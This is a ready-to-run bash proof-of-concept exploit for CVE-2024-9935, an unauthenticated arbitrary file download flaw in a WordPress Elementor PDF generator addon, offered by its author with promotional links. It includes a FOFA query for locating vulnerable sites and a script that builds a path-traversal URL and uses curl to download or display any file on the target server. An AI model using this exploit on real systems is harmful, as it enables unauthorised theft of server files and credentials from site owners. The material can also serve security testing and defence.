# CVE-2024-9935 POC - PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary File Download
# FOFA body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/" && body="wp-content/themes/" 
# Medium https://medium.com/@verylazytech
# Github https://github.com/verylazytech
# My Shop https://buymeacoffee.com/verylazytech/extras
# https://www.verylazytech.com

#!/usr/bin/env bash

banner() {
cat <<'EOF'
  ______     _______   ____   ___ ____  _  _      ___   ___ _________  
 / ___\ \   / / ____| |___ \ / _ \___ \| || |    / _ \ / _ \___ / ___| 
| |    \ \ / /|  _|     __) | | | |__) | || |_  | (_) | (_) ||_ \___ \ 
| |___  \ V / | |___   / __/| |_| / __/|__   _|  \__, |\__, |__) |__) |
 \____|  \_/  |_____| |_____|\___/_____|  |_|      /_/   /_/____/____/ 
                                                                       
__     __                _                      _____         _     
\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__  
 \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \ 
  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
                 |___/                  |___/                       
                                                                      
                    @VeryLazyTech - Medium
                    
EOF
}

# Call the banner function
banner

set -e

# Function to URL-encode a string
urlencode() {
    local string="$1"
    local encoded=""
    local pos c
    for (( pos=0; pos<${#string}; pos++ )); do
        c=${string:$pos:1}
        case "$c" in
            [a-zA-Z0-9.~_-]) encoded+="$c" ;;
            *) encoded+=$(printf '%%%02X' "'$c") ;;
        esac
    done
    echo "$encoded"
}

# Check for correct number of arguments
if [ "$#" -ne 3 ]; then
    printf "Usage: $0 <target_url> <file_path_to_download> <action: download|view>\n"
    exit 1
fi

target_url=$1
file_path=$2
action=$3

# URL-encode the file path
encoded_file_path=$(urlencode "$file_path")

printf "\033[0;32mAttempting to exploit CVE-2024-9935...\033[0m\n"

# Craft the exploit URL with the encoded file path
exploit_url="$target_url/elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f$encoded_file_path"

# Send the request
if [ "$action" == "download" ]; then
    response=$(curl -s -o "$(basename "$file_path")" --write-out "%{http_code}" "$exploit_url")
    # Check if the file was successfully downloaded
    if [ "$response" -eq 200 ]; then
        printf "\033[0;32m[+] Exploit successful! File saved as '%s'.\033[0m\n" "$(basename "$file_path")"
    else
        printf "\033[0;31m[-] Exploit failed. HTTP Response Code: $response\033[0m\n"
    fi
elif [ "$action" == "view" ]; then
    response=$(curl -s -o "$(basename "$file_path")" --write-out "%{http_code}" "$exploit_url")
    # Check if the file was successfully downloaded and is not empty
    if [ -s "$(basename "$file_path")" ]; then
        printf "\033[0;32m[+] Exploit successful! File content:\033[0m\n"
        cat "$(basename "$file_path")"
        rm "$(basename "$file_path")"
    else
        printf "\033[0;31m[-] File not found or empty.\033[0m\n"
        rm "$(basename "$file_path")"
    fi
else
    printf "\033[0;31m[-] Invalid action: '%s'. Use 'download' or 'view'.\033[0m\n" "$action"
    exit 1
fi
